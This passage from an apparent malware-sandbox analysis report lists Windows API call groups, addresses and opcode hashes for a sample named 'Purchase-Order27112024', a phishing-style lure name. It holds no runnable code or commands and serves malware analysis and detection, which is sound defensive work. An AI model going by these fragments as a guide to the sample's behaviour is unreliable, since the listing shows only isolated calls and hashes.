                                                                                                      • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                      APIs
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                                      • malloc.MSVCRT ref: 00417459
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                                                                                                      • free.MSVCRT ref: 0041747F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2605342592-0
                                                                                                      • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                      • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                      • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2678498856-0
                                                                                                      • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                      • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Item
                                                                                                      • String ID:
                                                                                                      • API String ID: 3888421826-0
                                                                                                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00417B7B
                                                                                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                      • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ErrorLastLockUnlockmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3727323765-0
                                                                                                      • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                      • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040F673
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                      • strlen.MSVCRT ref: 0040F6A2
                                                                                                      • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2754987064-0
                                                                                                      • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                      • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040F6E2
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                      • strlen.MSVCRT ref: 0040F70D
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2754987064-0
                                                                                                      • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                      • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00402FD7
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                      • strlen.MSVCRT ref: 00403006
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2754987064-0
                                                                                                      • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                      • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                      • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                      • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 764393265-0
                                                                                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                      APIs
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$System$File$LocalSpecific
                                                                                                      • String ID:
                                                                                                      • API String ID: 979780441-0
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                      • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                                      • String ID:
                                                                                                      • API String ID: 1386444988-0
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: InvalidateMessageRectSend
                                                                                                      • String ID: d=E
                                                                                                      • API String ID: 909852535-3703654223
                                                                                                      APIs
                                                                                                      • wcschr.MSVCRT ref: 0040F79E
                                                                                                      • wcschr.MSVCRT ref: 0040F7AC
                                                                                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: wcschr$memcpywcslen
                                                                                                      • String ID: "
                                                                                                      • API String ID: 1983396471-123907689
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                      • _memicmp.MSVCRT ref: 0040C00D
                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: FilePointer_memicmpmemcpy
                                                                                                      • String ID: URL
                                                                                                      • API String ID: 2108176848-3574463123
                                                                                                      APIs
                                                                                                      • _snwprintf.MSVCRT ref: 0040A398
                                                                                                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintfmemcpy
                                                                                                      • String ID: %2.2X
                                                                                                      • API String ID: 2789212964-323797159
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintf
                                                                                                      • String ID: %%-%d.%ds
                                                                                                      • API String ID: 3988819677-2008345750
                                                                                                      APIs
                                                                                                      • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                      • memset.MSVCRT ref: 00401917
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: PlacementWindowmemset
                                                                                                      • String ID: WinPos
                                                                                                      • API String ID: 4036792311-2823255486
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                      • wcscat.MSVCRT ref: 0040DCFF
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                                      • String ID: _lng.ini
                                                                                                      • API String ID: 383090722-1948609170
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                      • API String ID: 2773794195-880857682
                                                                                                      APIs
                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                      • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow
                                                                                                      • String ID: MZ@
                                                                                                      • API String ID: 1378638983-2978689999
                                                                                                      • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                      • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                      • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                      • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                      • memset.MSVCRT ref: 0042BAAE
                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 438689982-0
                                                                                                      • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                      • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1860491036-0
                                                                                                      • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                      • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                      APIs
                                                                                                      • wcslen.MSVCRT ref: 0040A8E2
                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                      • free.MSVCRT ref: 0040A908
                                                                                                      • free.MSVCRT ref: 0040A92B
                                                                                                      • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 726966127-0
                                                                                                      • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                      • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                      APIs
                                                                                                      • wcslen.MSVCRT ref: 0040B1DE
                                                                                                      • free.MSVCRT ref: 0040B201
                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                      • free.MSVCRT ref: 0040B224
                                                                                                      • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 726966127-0
                                                                                                      • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                      • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                      APIs
                                                                                                      • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                        • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                      • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                      • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 231171946-0
                                                                                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
